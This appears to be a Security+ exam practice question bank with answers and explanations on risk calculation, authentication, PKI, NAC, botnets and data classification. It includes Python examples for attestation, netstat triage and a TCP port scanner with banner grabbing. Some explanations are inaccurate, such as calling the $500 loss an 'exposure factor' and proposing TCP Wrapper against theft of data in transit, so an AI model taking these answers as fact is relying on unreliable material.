SLE The result of multiplying the asset values by the exposure factor (EF) is the single loss expectancy (SLE) value. SLE refers to the quantitative amount of loss incurred by a single event when a threat takes place. The formula for calculating SLE is: SLE = asset value x EF. EF is defined as the percentage of the expected loss when an event occurs. For example, a virus hits five computer systems out of 100 before it is prevented by the safeguard from further infecting the other 95 computers, resulting in a loss of five percent of the computers. If the asset value of 100 computers is $10,000, then the exposure factor will be $500, which is five percent of the total asset value. Annualized loss expectancy (ALE) refers to the loss potential of an asset for a single year. ALE is calculated by multiplying the SLE value with the annualized rate of occurrence (ARO) of an event. ARO refers to the frequency of a threat occurring in a single year. SLE is the amount, in dollars, that an organization will lose from even a single threat event. ALE = SLE x ARO. Let's look at an example of this: Suppose your organization has a server that is worth $10,000. When an outage occurs, you approximate that 10% of the data will be lost. The administrator has determined that the server will fail approximately 5 times each year. To calculate SLE, you would multiply the asset value ($10,000) times the exposure factor (10%) and get an SLE value of $1,000. This is the value of a single loss incident. Then to determine the ALE, you would multiply the SLE ($1,000) times the approximate number of times this incident will occur annually (5) and get an ALE value of $5,000. Total risk can be calculated by multiplying the threats, the vulnerabilities, and the asset value. Total risk = threats x vulnerabilities x asset value. Actual Cost Evaluation (ACV) is typically used for insurance calculation. ACV is based on the value of the item at the time of loss, plus some percent of the total loss as defined in the insurance contract clause. A risk cannot be eliminated completely. It can be accepted, reduced, or transferred, but some amount of risk will always be present, referred to as residual risk. You can also take steps to deter against risk. Risk deterrence is any action that you take to prevent a risk from occurring. Identifying residual risk is the most important aspect of the risk acceptance strategy.

Which of the following makes use of three components: a managed device, an agent, and a network management system?

SNMP SNMP (Simple Network Management Protocol) aids in monitoring devices and computers attached to a network. It can be broken down into three components: managed devices, agents, and a network management system (NMS). Wireshark is a protocol analyzer. Performance Monitor is a Windows program that analyzes the performance of the resources on a computer, and a Security log file is a log file within the Event Viewer used to audit systems.

What are LDAP and Kerberos commonly used for?

SSO Both LDAP and Kerberos can be used for single sign-on (SSO). This eases the burden on users of having to remember different usernames and passwords and allows a single login to multiple systems. A CA is used to sign certificates, including wildcard certificates. Queries on a directory service can be made with LDAP, but not with Kerberos. SSO is a derivative of federated identity management (FIM), but FIM will be its own system altogether separate of LDAP and Kerberos.

What is the technique of adding text to a password when it is hashed?

Salting Salting is additional random data that is added to a one-way cryptographic hash. It can be used by itself or with key stretching if the hash has a weak key. Rainbow tables are used to reverse cryptographic password hashes. Salting can help to deter this attack. Symmetric cryptography deals with the encryption of data using symmetric protocols such as the Advanced Encryption Standard (AES) and the Data Encryption Standard (DES). NTLMv2 is a newer Microsoft password hash used by Windows.

Users in your organization receive an e-mail encouraging them to click a link to obtain exclusive access to the newest version of a popular smartphone. What is this an example of?

Scarcity Scarcity refers to a limited supply, something in short supply, thus "exclusive access" in the question. Some users, especially the ones at the top of the marketing pyramid—the innovators—don't want to be left out of the latest, newest, exclusive smartphone offers. It is these people that are targeted by social engineers with the method of scarcity. Most likely, the link is bogus, and leads to another website altogether unexpected by the user. It is possible that the e-mail could use the other methods mentioned in the incorrect answers, but they are not described in the scenario. An example of trust would be a money-back guarantee, or using some kind of knowledge of the user. An example of intimidation could be the use of hoax ransomware, or perhaps the e-mail says you are required to appear in court, and so on. An example of familiarity would be if a social engineer shows sympathy or empathy for a user, usually with previously learned information about the user.

You want to ensure that your systems are protected against rootkits and boot sector viruses. Which security option would be the most effective?

Secure boot and attestation Secure boot and attestation would be the most effective protection and are closely related. Secure boot creates a hash of the boot loader and associated drivers, then compares that to a previously stored hash. The stored hash may be managed by a Trusted Platform Module (TPM). Additional security can be gained by storing the hash on a remote computer for remote attestation, whereby it validates the hardware and software configuration based on information stored on a remote server. Both of these would provide file integrity, thereby protecting against rootkits and boot sector viruses. Answer B is incorrect. Full disk encryption (FDE) and self-encrypting drives (SED) are closely related. FDE goes beyond the file- and folder-level encryption in NTFS. BitLocker is one such product, and is built into all versions of Windows 7 and newer. SED drives contain an encryption chip. Two keys are required, the Media Encryption Key (MEK) and the Key Encryption Key (KEK). The user generates the KEK, and the KEK decrypts the MEK. Once the MEK is decrypted, the MEK is used to encrypt and decrypt the drive. These would encrypt the contents of the drive, but would not provide file integrity. Answer A is incorrect. Hardware Root of Trust (RoT) starts with a read-only hardware identity stored in a TPM. Each startup component is validated against the RoT to protect against tampering. This protects hardware drivers but does not protect against rootkits and boot sector viruses. Answer D is incorrect. Electromagnetic interference (EMI) and electromagnetic pulses (EMPs) can cause damage to systems. At times, EMI protection can be something as simple as using STP cabling where necessary. EMP protection can include Faraday cages. Rootkits and boot sector viruses do not generate EMPs or EMI. Other issues to consider include security concerns for UEFI, BIOS, and supply chains. A computer's Unified Extensible Firmware Interface (UEFI) or Basic Input/Output System (BIOS) should always be password protected to prevent unauthorized changes. UEFI is the newer platform that performs all of the older BIOS functions, and also provides new and improved features. Supply chains must also be verified for their security practices. Vendors and others in your supply chain should adhere to at least a minimum set of security standards. For example, purchasing a server from an unverified vendor using a third-party marketplace, like eBay, could mean buying hardware that has been pre-infected with rootkits, keystroke loggers, or other types of malware.

You need to incorporate SAML and SSO into a web application. Which of the following would you use?

Shibboleth Shibboleth uses Security Assertion Markup Language (SAML), which defines security authorizations on web pages as opposed to web page elements in HTML. Shibboleth is a single sign-on (SSO) system that uses an identity provider and a service provider. OAuth is Open Authorization. The current standard, OAuth 2.0, grants an application limited access to a user's account on a third-party site, such as Facebook or Twitter. OAuth could grant the application access to a friend's list or give the application the ability to post on the user's behalf. OpenID Connect provides the authentication necessary in OAuth. It authenticates the user and stores the user information in a token. OAuth does not work with SAML. A secure token contains the user information and authentication information used by OpenID.

What kind of monitoring methodology does an antivirus program use?

Signature based Antivirus programs normally use signature-based monitoring. IDS solutions also use this. Signature-based monitoring analyzes frames and packets of network traffic for predetermined attack patterns. Anomaly-based monitoring establishes a performance baseline based on a set of normal network traffic and valuations. Behavior-based monitoring looks at the previous behavior of applications and compares that to the current activity on the system. Statistical-based monitoring is another name for anomaly-based monitoring.

Keyboard cadence is an example of which type of multifactor authentication?

Something you do Keyboard cadence is an example of something you do. When the user enters a new password, the keystroke timing (cadence) is recorded as a signature pattern. Subsequent logons are compared against the recorded signature. Even if an attacker was able to obtain a user's password, there is only a remote likelihood that the attacker's cadence would match the recorded cadence. Biometrics is an example of something you are. Fingerprints, voiceprints, retina scans, and iris scans are all biometrics. Something you have is based on the user possessing some type of security device. These can include things such as smart cards, tokens, and key fobs. Something you know would be a password, a PIN, the name of a childhood friend, the color of your first car, or the answer to a similar question. For the Security+ exam, you must understand the following authentication factors: something you are, something you have, something you know, somewhere you are, and something you do. Other authentication topics include federation and federated identity and transitive trust. Federation and federated identity is a user's ability to authenticate with a single identity across multiple businesses or networks. It differs from single sign-on, where a user has one password that grants access to all the permitted network resources. Federation relies on trust relationships that are established between the different businesses or networks. Transitive trust involves creating relationships between domains to grant authenticated users access to other domains. In Active Directory, for example, if the Sales domain trusts the Marketing domain, and the Marketing domain trusts the HR domain, then Sales trusts the HR domain through a transitive relationship.

You are responsible for code quality and testing. What should you incorporate to ensure that memory allocations have corresponding deallocations?

Static code analyzers Static code analyzers check whether memory allocation commands have corresponding deallocation commands. Stress testing puts a load on the system much higher than what is normally expected. For example, testing a website with 100x the normal amount of traffic will identify how the system will respond to the stress. Stress tests will not check for memory deallocations, although stress test results may indicate that memory is not being released. Answer A is incorrect. Sandboxing is developing an application outside of the production environment. Sandboxing can also be useful to test a legacy operating system that may not have security patches. Virtual machines are often used to create the sandbox. Memory allocation issues may be discovered during sandbox testing, but are not directly a part of the sandbox functionality. Answer D is incorrect. Model verification is important. There are many types of simulation models, and it is critical that you examine whatever model you use for accuracy. Any incorrect data or configuration settings in the model will yield inaccurate results. This will not check for memory deallocation. You should also keep in mind that when comparing compiled versus runtime code, compiled code is more secure. In runtime applications (Java and .NET, for example), the runtime execution environment may have vulnerabilities, so checking for the most current version is a concern.

You look through some graphic files and discover that confidential information has been encoded into the files. These files are being sent to a sister company outside your organization. What is this an example of?

Steganography Steganography is the science and art of writing hidden messages. It is a form of security through obscurity. The goal is that no one aside from the sender and receiver should even suspect that a hidden message exists. Although steganography can come in different forms, it is most commonly found in image files. Confidentiality means preventing the disclosure of information to unauthorized persons. By definition, cryptography is the practice and study of hiding information. In computer science, cryptography uses encryption to hide information and make it secret, whereas steganography, if accomplished correctly, does not imply that a hidden message even exists. If a person were to see an encrypted cryptographic message, they would know it for what it is and may try to crack it. A digital signature authenticates a document or e-mail, letting the recipient know that the document was created and sent by the actual sender and not someone else.

Your web server's private key has been compromised by a malicious intruder. What, as the security administrator, should you do?

Submit the public key to the CRL. In a PKI, an asymmetric key pair is created. The private key is kept secret, but the public key is distributed as needed. It is this public key that should be submitted to the CRL so that no other entities utilize it. A new key pair will then be created at the CA. A new CA is not necessary. It would only be necessary if the entire CA was compromised, which is not part of the scenario. The private key is not seen by other entities, so only the public key should be submitted to the CRL. Key escrow is when copies of keys are kept in the case a third party needs access to data.

Which of the following common use cases would address the issue of data leakage from a side-channel attack?

Supporting high resiliency Supporting high resiliency, such as using a highly resilient algorithm, would address the issue of data leakage from a side-channel attack. Supporting confidentiality refers to the ability of the system to maintain the privacy of the data transmission. This is often accomplished through encryption. Supporting integrity validates that no data can be altered without being detected. This is often accomplished through data hashing. Supporting non-repudiation would prevent an imposter from denying that a message was sent, but it does not address data security. Non-repudiation ensures that data's origin is known. Digital signatures are the most common method of ensuring non-repudiation. Other common use cases for cryptography that must be understood for the Security+ exam include low-power devices, low latency, obfuscation, supporting authentication, and resource versus security constraints. Low-power devices should use cryptographic techniques that require less time to encrypt and decrypt data. As the time required to encrypt or decrypt increases, the power requirements increase as well. Devices such as wireless devices, handheld computers, smart cards, and cellular phones have less processing power, storage, power, memory, and bandwidth than other systems, and would benefit from algorithms with shorter key lengths. Low latency is a concern with any cipher. Latency refers to the delay between the time the plain text is input and the cipher text is generated. Obfuscation is the most basic element in a cryptographic system. Obfuscation refers to hiding the data, and is accomplished through encryption and steganography. Supporting authentication is the process of validating that the message originator is indeed who they say they are, and not an imposter. This is often implemented using digital certificates. It is also important to determine resource versus security constraints. Resource constraints could include available bandwidth, environmental constraints, and financial constraints. Security constraints would deal with the limitations of the particular cryptographic system chosen.

You want to reduce network traffic on a particular network segment to limit the amount of user visibility. Which of the following is the best device to use in this scenario?

Switch A switch can reduce network traffic on a particular network segment. It does this by keeping a table of information about computers on that segment. Instead of broadcasting information to all ports of the switch, the switch selectively chooses where the information goes.

You are reviewing your organization's continuity plan, which specifies an RTO of six hours and an RPO of two days. Which of the following is the plan describing?

Systems should be restored within six hours with a maximum of two days' worth of data latency. RTO stands for recovery time objective, the acceptable amount of time to restore a function, service, or entire system. In the question the RTO is six hours, and so systems should be restored within six hours. RPO stands for recovery point objective, the acceptable latency of data, or the maximum tolerable time that data can remain inaccessible after a disaster. In the question the RPO is two days, and so there should be a maximum of two days' worth of data latency.

You need to control access to a network through a Cisco router. Which of the following authentication services should you use?

TACACS+ TACACS+ is commonly used to control access to networks through Cisco routers. SSH is used primarily to remotely configure Linux/Unix hosts as well as routers but is not used for the actual authentication to the networks that the routers control. Telnet was used to administer network devices, but it is not the best answer because it is not an authentication protocol, and it is insecure and outdated. SNMP is used to monitor network devices and hosts.

The organization you work for, a video streaming company, hired a security consultant to find out how customer credit card information was stolen. He determined that it was stolen while in transit from gaming consoles. What should you implement to secure this data in the future?

TCP Wrapper TCP Wrapper is a host-based ACL program that provides protection against host name and host address spoofing in Linux and Unix environments. Most gaming consoles are Linux-based, and the video streaming servers they connect to are most likely Linux- or Unix-based as well. By using this program, rules can be configured to restrict access to TCP services. For example, attackers can easily determine when an unprotected Linux-based system is idle, and then attempt to access that system when it is unattended. The TCP Wrapper program acts as a pseudo-firewall in that it monitors incoming packets for authorization, thereby blocking the potential attacker. Programs used for streaming can be compiled with TCP Wrapper, and these can also be encrypted to further foil the would-be attacker. (Often this program is also referred to as TCP Wrappers.) By the way, credit card numbers should usually be stored in a transactional database that encrypts down to the database field level, not only the file level. Firmware updates are important for any system, but will not stop the problem being described. Some kind of software such as TCP Wrapper (an application layer program) is needed. A web application firewall (WAF) isn't the correct type of firewalling required by video streaming servers and the gaming consoles that connect to them. Plus, WAF along with IDS are solutions that are installed at the server side. This scenario calls for secure coding of the program that transmits data between the gaming consoles and the video streaming servers.

Which of the following would be considered detrimental effects of a virus hoax? (Select the two best answers.)

Technical support resources are consumed by increased user calls. Users are tricked into changing the system configuration. Because a virus can affect many users, technical support resources can be consumed by an increase in user phone calls. This can be detrimental to the company because all companies have a limited number of technical support personnel. Another detrimental effect is that unwitting users may be tricked into changing some of their computer system configurations. The key term in the question is "virus hoax." The technical support team might also be inundated by support e-mails from users, but not to the point where the e-mail server capacity is consumed. If the e-mail server is consumed by message traffic, that would be a detrimental effect caused by the person who sent the virus and by the virus itself but not necessarily by the hoax. Although users may be at risk for identity theft, it is not one of the most detrimental effects of the virus hoax.

Your network has a DHCP server, AAA server, LDAP server, and e-mail server. Instead of authenticating wireless connections locally at the WAP, you want to utilize RADIUS for the authentication process. When you configure the WAP's authentication screen, what server should you point to, and which port should you use?

The AAA server and port 1812 AAA in computer security is an acronym that refers to authentication, authorization, and accounting. RADIUS (Remote Authentication Dial-In User Service) is an example of an AAA server, and would be the server that takes care of authentication for the wireless access point (WAP) in this scenario. By default, the RADIUS server uses port 1812 for authentication. Also by default, it does this over a UDP transport mechanism (though it can use TCP as well). The DHCP server (which uses ports 67 and 68) takes care of assigning IP addresses to computers on the network that require dynamic assignment. The Lightweight Directory Access Protocol (LDAP) server is used to maintain directory information, for example, in a Microsoft domain controller or an e-mail server. It uses port 389. It is based on the X.500 specification, and allows either unencrypted authentication or encrypted authentication via Transport Layer Security (TLS). An e-mail server that uses port 143 has the Internet Message Access Protocol (IMAP) e-mail protocol running. Though this server may be involved in the authentication of e-mail logins, it does not authenticate for connections made to a WAP.

You work for a company that installs networks for small businesses. During a recent deployment, you configure a network to use the Internet Protocol Security (IPSec) protocol. The business owner asks you to explain why this protocol is being used. Which three are valid reasons for using this protocol?

The IPSec framework is used in a VPN implementation to secure transmissions. IPSec can work in either tunnel mode or transport mode. IPSec uses ESP and AH as security protocols for encapsulation. Internet Protocol Security (IPSec) uses Encapsulating Security Payload (ESP) and Authentication Header (AH) as security protocols. AH provides the authentication mechanism, and ESP provides encryption, confidentiality, and message integrity. IPSec can operate in either tunnel mode or transport mode. In transport mode, only the message part of a packet (the payload) is encrypted by ESP. In IPSec tunnel mode, the entire packet including the packet header and the routing information is encrypted. IPSec tunnel mode provides a higher level of security than transport mode. Either of the two modes can be used to secure either gateway-to-gateway or host-to-gateway communication. If used in gateway-to-host communication, the gateway must act as the host. IPSec sets up a secure channel that uses a strong encryption and authentication method between two network devices, such as routers, VPN concentrators, and firewalls. IPSec can provide security between any two network devices running IPSec, but its chief implementation is in securing virtual private network (VPN) communications. IPSec provides security by protecting against traffic analysis and replay attacks. IPSec is primarily implemented for data communication between applications that transfer data in plain text. IPSec secures the network device against attacks through encryption and encapsulation. Answer E is incorrect. IPSec does not use the L2TP protocol to encrypt messages. L2TP is used for secure communication in VPN networks and is a hybrid of L2F and PPTP. IPSec ensures integrity and confidentiality of IP transmissions, but cannot ensure availability of the information.

On Monday, all employees of your organization report that they cannot connect to the corporate wireless network, which uses 802.1X with PEAP. A technician verifies that no configuration changes were made to the wireless network and its supporting infrastructure, and that there are no outages. Which of the following is the most likely cause of the problem?

The Remote Authentication Dial-In User Service certificate has expired. 802.1X port-based network access control can be used to connect to wireless networks. It carries EAP, with methods such as PEAP (which wraps an inner method such as MS-CHAPv2 in a TLS tunnel) or EAP-TLS, and it typically relies on a centralized authentication server such as RADIUS. Though the scenario does not say so specifically, you can assume an 802.1X/PEAP/RADIUS configuration. PEAP clients validate the RADIUS server's certificate when the TLS tunnel is built, so if that certificate expires every client rejects the server and no wireless user can connect, which matches an outage that hits everyone at once with no configuration change. The DNS server is a separate service altogether. If it were overwhelmed (perhaps by a DDoS attack), DNS queries for domain resources, websites, and so on would fail, but that would not stop clients from associating and authenticating to the wireless network. Too many incorrect authentication attempts could cause some accounts to be locked out, but that would be a temporary loss of service for a few users, whereas in the scenario all employees report no service to the wireless network. The scenario also states that the technician verified there were no outages, so an IDS should not have disabled the wireless network.

attestation

The act of proving to another party that a system or process is in a known, trusted state, typically by having a hardware root of trust such as a TPM sign measurements (hashes) of the components that ran, so a remote verifier can compare them against expected values; for example, attesting the secure boot process of a UEFI-based system.
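An added example of the mechanism behind that definition (not code from the original page, and not a real TPM library): measured boot extends a PCR with the hash of each component, the "TPM" answers a verifier's nonce with a keyed quote over the PCR, and the verifier replays the event log and compares against golden values. The component images, the attestation key and the nonces are constructed for the demo, and the quote is an HMAC standing in for the asymmetric signature a real TPM produces.

```python
import hashlib
import hmac

PCR_SIZE = 32  # SHA-256 PCR bank

# Constructed stand-ins for the measured boot components and the TPM's attestation key.
GOOD_CHAIN = [("uefi-firmware", b"firmware-image-v1"),
              ("bootloader", b"bootloader-image-v1"),
              ("kernel", b"kernel-image-v1")]
AK = b"constructed-attestation-key-held-only-by-the-tpm"


def extend(pcr, digest):
    """TPM PCR extend: PCR_new = H(PCR_old || digest). One-way, and order-dependent."""
    return hashlib.sha256(pcr + digest).digest()


def measured_boot(chain):
    """Each stage hashes the next before handing over; the TPM accumulates the hashes in a PCR."""
    pcr, event_log = bytes(PCR_SIZE), []
    for name, image in chain:
        digest = hashlib.sha256(image).digest()
        event_log.append((name, digest))
        pcr = extend(pcr, digest)
    return pcr, event_log


def tpm_quote(pcr, nonce):
    """Stand-in for a TPM quote: MAC over (PCR value, verifier nonce) with the attestation key.
    A real quote is an asymmetric signature by the AK, so the verifier needs only its public half."""
    return hmac.new(AK, pcr + nonce, hashlib.sha256).digest()


def verify_attestation(expected_pcr, nonce, reported_pcr, signature, event_log):
    """Verifier side: replay the log, check freshness and authenticity, then compare to the golden value."""
    pcr = bytes(PCR_SIZE)
    for _, digest in event_log:
        pcr = extend(pcr, digest)
    if pcr != reported_pcr:
        return "event log does not reproduce the reported PCR"
    if not hmac.compare_digest(tpm_quote(reported_pcr, nonce), signature):
        return "quote is not fresh or not from this TPM"
    if reported_pcr != expected_pcr:
        golden_log = measured_boot(GOOD_CHAIN)[1]
        bad = [name for (name, d), (_, g) in zip(event_log, golden_log) if d != g]
        return "boot chain differs from golden values at: " + ", ".join(bad)
    return "attested"


def attest(chain, nonce):
    """Attester side: boot, then answer the verifier's challenge with PCR, quote and log."""
    pcr, log = measured_boot(chain)
    return pcr, tpm_quote(pcr, nonce), log
```

The nonce is what stops a compromised machine from replaying a quote recorded while it was still healthy, and the log replay is what lets the verifier name the component that changed rather than only seeing a different PCR.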

A computer that is connected to an NAC-enabled network is not asked for the proper NAC credentials. What is a possible reason for this?

The computer is missing the authentication agent. In a network access control (NAC) enabled network, computers must have the authentication agent installed; otherwise, the NAC system will not prompt for credentials, and the computer will not get access to the network (or will be parked in a quarantine VLAN). The authentication agent is also known as a supplicant (in 802.1X systems, for example). The patch level, antivirus definitions, and service packs (SPs) are posture items a NAC system checks after the agent has reported in; they are not reasons the system would fail to ask for credentials.

A user complains that they were browsing the Internet when the computer started acting erratically and crashed. You reboot the computer and notice that performance is very slow. In addition, after running a netstat command you notice literally hundreds of outbound connections to various websites, many of which are well-known sites. Which of the following has happened?

The computer is now part of a botnet. The computer is probably now part of a botnet. The reason the system is running slowly is most likely the hundreds of outbound connections to various websites, which consume CPU, memory, and bandwidth. That fan-out is a solid sign of a computer that has become part of a botnet: a bot takes commands from its controller and then participates in a DDoS, spam, or click-fraud run against many targets at once. Spyware, viruses, and rootkits can also make a computer run slowly, but by themselves they do not characteristically open hundreds of concurrent outbound connections. When triaging, record which process owns the connections (for example, the PID column of netstat -ano on Windows, or ss -tp on Linux) before pulling the machine off the network, so the evidence survives containment.
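An added example of turning that netstat observation into a check (not code from the original page): parse netstat -ano output, count how many distinct remote hosts each PID is actively talking to, and flag the outliers. The sample output below is constructed for the demo: a browser (PID 1234) with a couple of connections and a second process (PID 4420) fanning out to 120 hosts; the threshold of 50 is a starting point to tune against your own baseline, not a fixed rule.

```python
from collections import defaultdict


def _bot_row(i):
    """Constructed netstat row for the misbehaving process (PID 4420)."""
    port = 80 if i % 3 else 443
    state = "SYN_SENT" if i % 7 == 0 else "ESTABLISHED"
    return f"  TCP    192.168.1.20:{50000 + i}     203.0.113.{i + 1}:{port}     {state}     4420"


# Constructed 'netstat -ano' output (Windows format: Proto, Local, Foreign, State, PID).
SAMPLE = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       900
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    192.168.1.20:49712     142.250.72.68:443      ESTABLISHED     1234
  TCP    192.168.1.20:49713     151.101.1.69:443       ESTABLISHED     1234
  TCP    192.168.1.20:49714     151.101.1.69:443       TIME_WAIT       1234
  UDP    0.0.0.0:5353           *:*                                    1100
""" + "\n".join(_bot_row(i) for i in range(120))

ACTIVE_STATES = {"ESTABLISHED", "SYN_SENT"}
LOCAL_ADDRESSES = {"0.0.0.0", "127.0.0.1", "[::]", "[::1]"}


def parse_netstat_ano(text):
    """Parse TCP rows of 'netstat -ano' into dicts (UDP rows carry no state and are skipped)."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[0] == "TCP":
            _, local, remote, state, pid = parts
            laddr, lport = local.rsplit(":", 1)
            raddr, rport = remote.rsplit(":", 1)
            rows.append({"local": laddr, "lport": int(lport), "remote": raddr,
                         "rport": int(rport), "state": state, "pid": int(pid)})
    return rows


def outbound_fanout(rows):
    """Number of distinct remote hosts each PID is actively connected (or connecting) to."""
    fanout = defaultdict(set)
    for r in rows:
        if r["state"] in ACTIVE_STATES and r["remote"] not in LOCAL_ADDRESSES:
            fanout[r["pid"]].add(r["remote"])
    return {pid: len(hosts) for pid, hosts in fanout.items()}


def suspicious_pids(rows, threshold=50):
    """PIDs whose fan-out exceeds what a browser or updater plausibly needs."""
    return {pid: n for pid, n in outbound_fanout(rows).items() if n >= threshold}


def triage(text, threshold=50):
    rows = parse_netstat_ano(text)
    return {"connections": len(rows),
            "fanout": outbound_fanout(rows),
            "suspicious": suspicious_pids(rows, threshold)}
```

Counting distinct remote hosts rather than raw connections is deliberate: a browser opening six sockets to one CDN is normal, while one process touching dozens of unrelated hosts is the pattern the scenario describes.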

What can happen if access mechanisms to data on an encrypted USB hard drive are not implemented correctly?

The security controls on the USB drive can be bypassed. If access mechanisms such as permissions and policies are not implemented correctly on a USB hard drive (or any hard drive, for that matter), then the security controls for that drive can be bypassed by an attacker; with a removable drive this matters even more, because the attacker can simply mount it on a machine they control. Data corruption usually results from a physical drive failure or a power loss during writes, not from security controls being bypassed. Data on the USB drive should not be vulnerable to log analysis because the logs are normally stored in the system partition of the operating system. That drive is internal to the computer, whereas a USB hard drive is external to it. The same holds true for user accounts: those accounts are stored within the OS, again on the main drive, not on a USB hard drive.

A visitor plugs her laptop into the network in the conference room and attempts to start a presentation that requires Internet access. The user gets a warning on the screen saying that her antivirus software is not up to date. As a result, the visitor is unable to access the Internet. What is the most likely cause of this?

The security posture on the network is enabled, and remediation must take place before the user can access the Internet. The security posture is the overall security state of a system, expressed as the set of conditions it must meet (such as a current antivirus engine and definitions, required patches, and an enabled host firewall). When posture assessment is enabled on the network (typically through NAC), a connecting system must meet those requirements before it is granted normal access. In this case, the user cannot access the Internet with her laptop until the antivirus software is updated (the remediation). If the security posture were disabled, the user would not need to update her system. An IDS will not block access to the network; instead, an IDS detects malicious activity on the network. An IPS is not designed to prevent internal users from accessing the network; it is designed to prevent malicious activity on the network.

An attacker gained access to your server room by physically removing the proximity reader from the wall near the entrance. This caused the electronic locks on the door to release. Why did the locks release?

The system was designed to fail-open for life safety. In this scenario, the system did what it was supposed to do. In the case of a failure, the security administrator designed the system to fail-open, meaning that the door would unlock, allowing people to leave the server room in the event of an emergency (thus the meaning of life safety). The attacker probably had knowledge of this design and planned the attack accordingly. To protect against the attacker gaining access in this scenario, multifactor authentication could be implemented, for example by adding biometrics, a passcode, or another form of authentication. More directly, the reader should be a tamper-switched sensor on the unsecured side of the door while the lock controller sits on the secured side, so that losing the reader raises an alarm but does not release the lock; egress can still fail-open through a request-to-exit device inside the room. The proximity reader was installed properly. It's just that the system has vulnerabilities, one of which the attacker has exploited, and those vulnerabilities are built into the design of the system for safety. We don't know whether or not the system uses magnetic locks; there is not enough information in the question to make that assumption. The system was not designed in a fail-closed (fail-secure) configuration. If it were, the door would have remained locked when the proximity reader was removed.

Which of following log files would be the most useful in determining which internal user was the source of an attack that compromised another computer on the same network?

The target computer's audit logs. The target computer's audit logs should show the IP address (and, on the same subnet, possibly the MAC address and hostname) of the attacking computer if it was within the same network. Directory Services logs give information about Active Directory on a domain controller. It would be difficult to identify the attacking computer from its own logs, which is why you look to the target computer (the computer that was affected by the attack) for clues. The firewall logs show information about attackers from outside the network but will probably not record attackers inside the network, because internal-to-internal traffic never crosses the firewall.

The new security plan for your organization states that all data on your servers must be classified to ensure appropriate access controls are implemented. Which statements are true of information classification?

The two primary classes of data classification deal with military institutions and commercial organizations. A data owner must determine the information classification of an asset. Data classification refers to assigning security labels to information assets. The data owner must determine the information classification of an asset; it is the data owner's responsibility to decide the level of classification that the information requires. Data classification is a crucial method for ensuring that data receives protection proportional to its sensitivity. One purpose of information classification is to define the parameters required for security labels. After being classified, it is difficult to declassify data. There are two data classification systems: commercial and military.

The types of commercial data classification are as follows:

Confidential: Data classified as confidential is meant for use within the organization, irrespective of whether it is commercial or military. This is the only category common to the commercial and military classification systems. Confidential information requires authorization for each access and is available to those employees in the organization whose work relates to the subject. Confidential data is exempted from the Freedom of Information Act (FOIA). Examples include trade secrets, source code, or health care information. This can also be referred to as high classification.

Private: Private information is personal to the employees of a company, so it must be protected as well. An example is employee salaries. This can also be referred to as medium classification.

Sensitive: Sensitive information requires special protection from unauthorized modification or deletion. In other words, integrity as well as confidentiality must be ensured. Examples include financial information, profits, or project details.

Public: Disclosure of public information would not cause any problem for the company. An example is a new project announcement. This can also be referred to as low classification.

The types of military data classification are as follows:

Top secret: Information classified as top secret is crucial to national security. Examples include spy satellite information and blueprints for newly developed weapons.

Secret: Secret information can pose a threat to national security if disclosed. Examples include the deployment of troops and nuclear warheads.

Confidential: Confidential information requires authorization for each access and is available only to those in the military organization whose work relates to the subject.

Sensitive but unclassified: A military classification for minor secrets, such as medical data and test answers.

Unclassified: Information that is not sensitive or classified. Examples are computer manuals or the warranty details of a product or device.

Other types of data include proprietary data, PII, and PHI. Proprietary data is any data owned by an organization that helps define that organization, such as copyrights and patents. Personally identifiable information (PII) is data that can be used to identify an individual. Personal health information (PHI) is health data about individuals. Organizations should take special care to ensure that these types of data are adequately protected. Three organizational roles that may deal with data classification are the data custodian (or steward), the data owner, and the privacy officer. The data owner is responsible for setting the data classifications and approving the level of access given to personnel. The data custodian is responsible for configuring the appropriate level of access for users and for backing up the data. The privacy officer must ensure that appropriate privacy laws are followed and that data is protected.

Why would you use a vulnerability scanner?

To identify open ports on a computer. Vulnerability scanners start by finding the open ports on a computer and the services listening on them, then match those services and their versions against a database of known weaknesses (missing patches, weak configurations, default credentials) to report the threats associated with those ports. Remote access policies are reviewed on the server where the policy was created (for example, in Windows Server). Password recovery programs such as John the Ripper are used to crack passwords. To see whether passwords are being sent in clear text, you should use a protocol analyzer.
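An added example of the first step a vulnerability scanner performs (not code from the original page or from any scanner product): a TCP connect scan that completes the handshake on each port and reads a short banner to identify the service. To keep it self-contained it starts its own demo listener on a loopback port and sends a constructed "SSH-2.0" banner; point scan_ports at a real host only with authorization, since a connect scan is logged by the target.

```python
import socket
import threading


def start_demo_service(banner=b"SSH-2.0-demo-service\r\n"):
    """Constructed local target: a listener on an OS-assigned loopback port that greets with a banner."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:          # listener closed: stop serving
                return
            with conn:
                conn.sendall(banner)

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def scan_ports(host, ports, timeout=0.5):
    """TCP connect scan: full handshake per port, then a short banner read to identify the service.
    Returns {port: banner} for open ports only; refused and timed-out ports are closed or filtered."""
    found = {}
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            try:
                s.connect((host, port))
            except (ConnectionRefusedError, socket.timeout, OSError):
                continue
            try:
                banner = s.recv(128).decode("ascii", "replace").strip()
            except (socket.timeout, OSError):
                banner = ""          # open, but the service waits for the client to speak first
            found[port] = banner
    return found


def closed_port():
    """Find a loopback port that is currently closed (bind it to learn the number, then release it)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]
```

The banner is what lets a scanner move from "port 22 is open" to "OpenSSH x.y is running", which is the version it then looks up in its vulnerability database.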

What is the best reason for security researchers to use virtual machines?

To offer an environment where malware might be executed but with minimal risk to equipment. The best reason security researchers use virtual machines is that they offer an environment where malware can be executed with minimal risk to the equipment. The virtual machine is isolated from the host operating system, and it can simply be reverted to a snapshot or deleted if it is infected by viruses or other types of malware. Although the other answers are possible reasons a security researcher would use a virtual machine, the best answer is that it offers an isolated environment where malicious activity can occur but be easily controlled and monitored. Bear in mind that the isolation is only as good as the hypervisor and the VM's network configuration, and that some malware checks for virtualization and behaves differently when it detects it.

Why would you deploy a wildcard certificate?

